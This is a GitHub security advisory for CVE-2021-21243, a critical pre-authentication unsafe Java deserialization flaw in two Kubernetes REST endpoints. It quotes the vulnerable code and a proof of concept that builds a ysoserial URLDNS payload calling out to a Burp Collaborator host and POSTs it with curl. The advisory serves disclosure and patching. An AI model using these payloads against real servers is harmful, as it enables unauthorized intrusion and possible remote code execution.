Skip to content

Pre-Auth Unsafe Deserialization on KubernetesResource

Critical
robinshine published GHSA-9mmq-fm8c-q4fv Jan 11, 2021

Package

No package listed

Affected versions

<4.0.2

Patched versions

4.0.3

Description

Impacts

A Kubernetes REST endpoint exposes two methods that deserialize untrusted data from the request body:

	@Path("/allocate-job-caches")
	@Consumes(MediaType.APPLICATION_OCTET_STREAM)
	@Produces(MediaType.APPLICATION_OCTET_STREAM)
  @POST
  public byte[] allocateJobCaches(byte[] cacheAllocationRequestBytes) {
	CacheAllocationRequest allocationRequest = (CacheAllocationRequest) SerializationUtils.deserialize(cacheAllocationRequestBytes);

and

	@Path("/report-job-caches")
	@Consumes(MediaType.APPLICATION_OCTET_STREAM)
	@POST
	public void reportJobCaches(byte[] cacheInstanceBytes) {
		@SuppressWarnings("unchecked")
		Collection<CacheInstance> cacheInstances = (Collection<CacheInstance>) SerializationUtils
				.deserialize(cacheInstanceBytes);
		jobManager.reportJobCaches(getJobToken(), cacheInstances);
	}

These endpoints do not enforce any authentication or authorization checks.

PoC

java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin`
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/allocate-job-caches
java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/report-job-caches

This issue may lead to pre-auth RCE

Patches

This issue was fixed in 4.0.3 by not using deserialization at KubernetesResource side

Credits

This issue was discovered by @pwntester

Severity

Critical

CVE ID

CVE-2021-21243

Weaknesses

No CWEs